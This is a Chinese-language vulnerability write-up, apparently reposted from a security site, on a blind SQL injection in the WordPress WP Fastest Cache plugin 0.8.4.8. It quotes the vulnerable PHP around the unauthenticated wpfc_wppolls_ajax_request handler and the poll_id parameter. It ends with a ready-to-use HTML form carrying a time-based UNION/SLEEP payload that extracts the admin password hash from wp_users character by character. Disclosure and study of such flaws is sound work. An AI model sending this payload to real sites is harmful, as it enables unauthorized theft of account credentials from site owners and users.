WordPress WP Fastest Cache 插件0.8.4.8盲注

admin 2022年3月17日10:22:26评论57 views字数 2778阅读9分15秒阅读模式



文件: wp-fastest-cacheincwp-polls.php

public function hook(){ 	add_action( 'wp_ajax_nopriv_wpfc_wppolls_ajax_request', array($this, "wpfc_wppolls_ajax_request")); 	add_action( 'wp_ajax_wpfc_wppolls_ajax_request', array($this, "wpfc_wppolls_ajax_request"));}

$_POST["poll_id"]没有过滤,因为mysql_real_escape_string()只过滤x00, n, r, , ‘, “ and x1a.

文件: wp-fastest-cacheincwp-polls.php

public function wpfc_wppolls_ajax_request() { 	$id = strip_tags($_POST["poll_id"]); 	$id = mysql_real_escape_string($id);  	$result = check_voted($id);  	if($result){ 		echo "true"; 	}else{ 		echo "false"; 	} 	die();}

所以我们可以在check_voted_ip() 或check_voted_username()这两处进行注入。

文件: wp-pollswp-polls.php

function check_voted($poll_id) { 	$poll_logging_method = intval(get_option('poll_logging_method')); 	switch($poll_logging_method) { 		// Do Not Log 		case 0: 			return 0; 			break; 		// Logged By Cookie 		case 1: 			return check_voted_cookie($poll_id); 			break; 		// Logged By IP 		case 2: 			return check_voted_ip($poll_id); 			break; 		// Logged By Cookie And IP 		case 3: 			$check_voted_cookie = check_voted_cookie($poll_id); 			if(!empty($check_voted_cookie)) { 				return $check_voted_cookie; 			} else { 				return check_voted_ip($poll_id); 			} 			break; 		// Logged By Username 		case 4: 			return check_voted_username($poll_id); 			break; 	}}function check_voted_ip($poll_id) { 	global $wpdb; 	$log_expiry = intval(get_option('poll_cookielog_expiry')); 	$log_expiry_sql = ''; 	if($log_expiry > 0) { 		$log_expiry_sql = 'AND ('.current_time('timestamp').'-(pollip_timestamp+0)) < '.$log_expiry; 	} 	// Check IP From IP Logging Database 	$get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_ip = '".get_ipaddress()."' $log_expiry_sql"); 	if($get_voted_aids) { 		return $get_voted_aids; 	} else { 		return 0; 	}}function check_voted_username($poll_id) { 	global $wpdb, $user_ID; 	// Check IP If User Is Guest 	if (!is_user_logged_in()) { 		return 1; 	} 	$pollsip_userid = intval($user_ID); 	$log_expiry = intval(get_option('poll_cookielog_expiry')); 	$log_expiry_sql = ''; 	if($log_expiry > 0) { 		$log_expiry_sql = 'AND ('.current_time('timestamp').'-(pollip_timestamp+0)) < '.$log_expiry; 	} 	// Check User ID From IP Logging Database 	$get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_userid = $pollsip_userid $log_expiry_sql"); 	if($get_voted_aids) { 		return $get_voted_aids; 	} else { 		return 0; 	}}


<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request"> 	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- "> 	<input type="submit" value="Send"></form>



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                   WordPress WP Fastest Cache 插件0.8.4.8盲注http://cn-sec.com/archives/502870.html


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